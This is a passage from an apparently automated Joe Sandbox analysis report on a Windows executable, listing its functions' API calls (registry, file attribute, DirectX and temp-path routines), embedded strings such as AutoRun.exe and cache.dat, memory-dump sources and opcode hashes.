                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$AddressCloseLibraryLoadOpenPathProcQuerySystemTempValueWindows_strrchr
                                                                                                                                              • String ID: Programs$SHGetSpecialFolderPathA$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$\$shell32.dll
                                                                                                                                              • API String ID: 1347129311-4127225528
                                                                                                                                              • Opcode ID: 20eca63b0d048e5c17978578e2be2ad518ba2d992f55c58b281d0522d216412c
                                                                                                                                              • Instruction ID: 6c29c0d113d401325f6edbdc8838ba9d779a9de3388efc35fe5fb8b828dee468
                                                                                                                                              • Opcode Fuzzy Hash: 20eca63b0d048e5c17978578e2be2ad518ba2d992f55c58b281d0522d216412c
                                                                                                                                              • Instruction Fuzzy Hash: AA512834348341AFE720CF649C16FEB7B945F46B06F14445DF980AB283E6A8D648C7AE
                                                                                                                                              Function 0041BD40 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 172comCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0041BD52
                                                                                                                                              • CoCreateInstance.OLE32 ref: 0041BD7A
                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0041BE09
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0041BE4B
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0041BE85
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,0000000A,00000000,00000000), ref: 0041BEBD
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0041BEDB
                                                                                                                                              • CoUninitialize.OLE32 ref: 0041BF1D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$Clear$ByteCharCreateInitInitializeInstanceMultiUninitializeWide
                                                                                                                                              • String ID: DxDiag_SystemInfo$dwDirectXVersionMajor$dwDirectXVersionMinor$o$szDirectXVersionLetter
                                                                                                                                              • API String ID: 2631059323-2475506770
                                                                                                                                              • Opcode ID: 45ec07c7a0de31864688631775407bbafd12fcb00f604bec3ea34e2fc70ed8bd
                                                                                                                                              • Instruction ID: b5decee8adbc2d1d78082e6867677709e582f8e87df30048daafc0e7f78e0333
                                                                                                                                              • Opcode Fuzzy Hash: 45ec07c7a0de31864688631775407bbafd12fcb00f604bec3ea34e2fc70ed8bd
                                                                                                                                              • Instruction Fuzzy Hash: D3511674208381AFD700CF25C884A9BBBE9EFCA704F04894EF584C7261D779D985CBA6
                                                                                                                                              Function 0040C000 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 318sleepCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                                                • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                                                • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                                • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                                • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                                • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                                • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,00000000), ref: 0040C0FD
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040C10C
                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040C117
                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040C12B
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C30F
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 0040C321
                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,00000000), ref: 0040C32C
                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000), ref: 0040C343
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFileSleep$AddressDirectoryLibraryLoadProc$PathSystemTempWindows
                                                                                                                                              • String ID: %s\AutoRun.exe$%s\AutoRunGUI.dll$-restart -dir $Could not copy '%s' to '%s'
                                                                                                                                              • API String ID: 3057974866-2581532531
                                                                                                                                              • Opcode ID: fd5262b79a8323c6ee9bbbd5519ee61f856e7b900ff64039663f89a4e1efefc1
                                                                                                                                              • Instruction ID: 5c815c8dee34c80f282a7deb6532afe064d91d0bacc265e00ff7ac027498d6f5
                                                                                                                                              • Opcode Fuzzy Hash: fd5262b79a8323c6ee9bbbd5519ee61f856e7b900ff64039663f89a4e1efefc1
                                                                                                                                              • Instruction Fuzzy Hash: C8B199B2144340AFD315EBA0CCC5EEB73A9EFC4704F044E2EB58657191EB78A648C79A
                                                                                                                                              Function 00404A2A Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 356COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %s\%s$%s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                                              • API String ID: 0-1652018963
                                                                                                                                              • Opcode ID: be913b56ed26ee2750d62859451965158e8d14aa541663ac7088a56196c6f96f
                                                                                                                                              • Instruction ID: 726ea9fac86a746ee88a84a523912b90f33f2c02f38a423fdf5978b62fbff5e6
                                                                                                                                              • Opcode Fuzzy Hash: be913b56ed26ee2750d62859451965158e8d14aa541663ac7088a56196c6f96f
                                                                                                                                              • Instruction Fuzzy Hash: 42D15C715083829FC321DB34D894BEBB7E5AF95308F04495EE5C987281EB38D64DCB56
                                                                                                                                              Function 00418CF8 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 341COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %s\%s$%s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                                              • API String ID: 0-1652018963
                                                                                                                                              • Opcode ID: 0327c2d6323db41f253a0066c32c2d91ef57ac9b8a11f82df8a7614baadf85a6
                                                                                                                                              • Instruction ID: 2d8a66965c8b461d22716a2f9fc51bb70f3807e377028b73b074f7c4a795e774
                                                                                                                                              • Opcode Fuzzy Hash: 0327c2d6323db41f253a0066c32c2d91ef57ac9b8a11f82df8a7614baadf85a6
                                                                                                                                              • Instruction Fuzzy Hash: B0C15E715083829FC321DB20D894FEBB7E9AF95308F08495EE5C987241EB38D64DCB96
                                                                                                                                              Function 00417560 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 153registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegEnumKeyExA.ADVAPI32 ref: 004175AE
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004175F5
                                                                                                                                              • RegOpenKeyExA.ADVAPI32 ref: 0041761F
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 0041763F
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00417651
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041766F
                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000000,00020019,?), ref: 00417707
                                                                                                                                              • RegOpenKeyExA.ADVAPI32 ref: 00417731
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00417744
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00417755
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$DeleteOpen$Enum
                                                                                                                                              • String ID: %s\%s
                                                                                                                                              • API String ID: 2508677364-4073750446
                                                                                                                                              • Opcode ID: 46427c48c67e0cc231f759d9888d3613f253180f667232f7090628fbc8ee51e4
                                                                                                                                              • Instruction ID: 890bdd7ef58192d3601e2139cb52636c82b3411bbe28373fb4b23228c678dd54
                                                                                                                                              • Opcode Fuzzy Hash: 46427c48c67e0cc231f759d9888d3613f253180f667232f7090628fbc8ee51e4
                                                                                                                                              • Instruction Fuzzy Hash: 8C5191B55087419FD320DF58D884AEBB7F8FB89314F044D2EF99683241D7389A48CB66
                                                                                                                                              Function 0042B105 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 71libraryloaderthreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,75920A60,00000000,0042575D), ref: 0042B11D
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042B135
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042B142
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042B14F
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042B15C
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0042B1DA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$CurrentHandleModuleThread
                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                                                                                              • API String ID: 46939698-282957996
                                                                                                                                              • Opcode ID: fa3fe8352348c15f00598b62091e80e0ddde9f8a27996319b7a897add45f9042
                                                                                                                                              • Instruction ID: 8343617a602856c7a5069f3be63dd48b7f90f14781bef638d1b05418c87fafc1
                                                                                                                                              • Opcode Fuzzy Hash: fa3fe8352348c15f00598b62091e80e0ddde9f8a27996319b7a897add45f9042
                                                                                                                                              • Instruction Fuzzy Hash: D321B0706513609BC7B09FB6BC0592B3BE0EB427B9761093FE800C32A0EB789805DB5D
                                                                                                                                              Function 00418EC8 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 202COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RemoveDirectoryA.KERNEL32 ref: 00418F96
                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?), ref: 0041901D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DirectoryPathRemoveTemp
                                                                                                                                              • String ID: %s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                                              • API String ID: 1713547617-3190903220
                                                                                                                                              • Opcode ID: fe41703e54320f95e6681c1eb24154ae3abf6755114a66f0cff30b271b00e26e
                                                                                                                                              • Instruction ID: 9d8b5efe2bea3eca9e416bc16e4a7f17c4f3e66b95ae640699afb986d6dc11f0
                                                                                                                                              • Opcode Fuzzy Hash: fe41703e54320f95e6681c1eb24154ae3abf6755114a66f0cff30b271b00e26e
                                                                                                                                              • Instruction Fuzzy Hash: B8715B710083869FC331DB20D8A4BE7B7E9AFD9308F04495EE5C987241EB39964DC74A
                                                                                                                                              Function 00430BC0 Relevance: 16.8, APIs: 11, Instructions: 299COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
